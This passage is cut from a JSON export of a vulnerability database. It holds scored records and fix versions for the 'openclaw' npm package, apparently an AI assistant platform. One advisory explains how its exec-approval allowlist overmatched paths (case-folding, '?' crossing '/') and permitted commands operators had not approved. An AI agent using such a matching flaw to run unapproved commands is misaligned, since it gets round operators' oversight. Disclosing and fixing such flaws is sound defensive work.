cff34a7f"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-846p-hgpv-vphc","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-846p-hgpv-vphc"},{"reference_url":"https://github.com/advisories/GHSA-846p-hgpv-vphc","reference_id":"GHSA-846p-hgpv-vphc","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-846p-hgpv-vphc"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109939?format=json","purl":"pkg:npm/openclaw@2026.4.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.2"}],"aliases":["GHSA-846p-hgpv-vphc"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-p7v5-jqhq-nbhz"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89625?format=json","vulnerability_id":"VCID-p8xd-2um4-9ufr","summary":"OpenClaw: Assistant media route missed scope enforcement for trusted-proxy authorization\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `< 2026.4.20`\n- Patched version: `2026.4.20`\n\n## Impact\n\nThe Control UI assistant-media route authenticated trusted-proxy callers but did not enforce the declared operator scopes for identity-bearing HTTP auth paths. A trusted-proxy caller without `operator.read` could access assistant-media files and metadata that were otherwise inside allowed media roots.\n\nThe route still required successful gateway authentication and media-root checks. Severity is low.\n\n## Fix\n\nAssistant-media file and metadata requests now require `operator.read` on identity-bearing HTTP auth paths.\n\nFix commit:\n\n- `99ef3a63c58440d53f8e45ad861b846032fcb036`\n\n## Release\n\nFixed in OpenClaw `2026.4.20`.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41908","reference_id":"","reference_type":"","scores":[{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.11147","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.11181","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.11188","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41908"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/99ef3a63c58440d53f8e45ad861b846032fcb036","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-23T18:25:38Z/"}],"url":"https://github.com/openclaw/openclaw/commit/99ef3a63c58440d53f8e45ad861b846032fcb036"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-v8qf-fr4g-28p2","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-23T18:25:38Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-v8qf-fr4g-28p2"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41908","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41908"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-scope-enforcement-bypass-in-assistant-media-route","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-23T18:25:38Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-scope-enforcement-bypass-in-assistant-media-route"},{"reference_url":"https://github.com/advisories/GHSA-v8qf-fr4g-28p2","reference_id":"GHSA-v8qf-fr4g-28p2","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-v8qf-fr4g-28p2"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109923?format=json","purl":"pkg:npm/openclaw@2026.4.20","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-ymmv-2qmq-6kap"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.20"}],"aliases":["CVE-2026-41908","GHSA-v8qf-fr4g-28p2"],"risk_score":1.9,"exploitability":"0.5","weighted_severity":"3.9","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-p8xd-2um4-9ufr"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91419?format=json","vulnerability_id":"VCID-p984-bgmq-zqc9","summary":"OpenClaw: Exec approval allowlist patterns overmatched on POSIX paths\n### Summary\n\n`matchesExecAllowlistPattern` normalized patterns and targets with lowercasing and compiled glob matching too broadly on POSIX. In addition, the `?` wildcard could match `/`, which allowed matches to cross path segments.\n\n### Impact\n\nThese matching rules could overmatch allowlist entries and permit commands or executable paths that an operator did not intend to approve.\n\n### Affected versions\n\n`openclaw` `<= 2026.3.8`\n\n### Patch\n\nFixed in `openclaw` `2026.3.11` and included in later releases such as `2026.3.12`. Exec allowlist matching now respects the intended path semantics, and regression tests cover the POSIX case-folding and slash-crossing cases.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.11","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.11"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-f8r2-vg7x-gh8m","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-f8r2-vg7x-gh8m"},{"reference_url":"https://github.com/advisories/GHSA-f8r2-vg7x-gh8m","reference_id":"GHSA-f8r2-vg7x-gh8m","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-f8r2-vg7x-gh8m"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74883?format=json","purl":"pkg:npm/openclaw@2026.3.11","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-y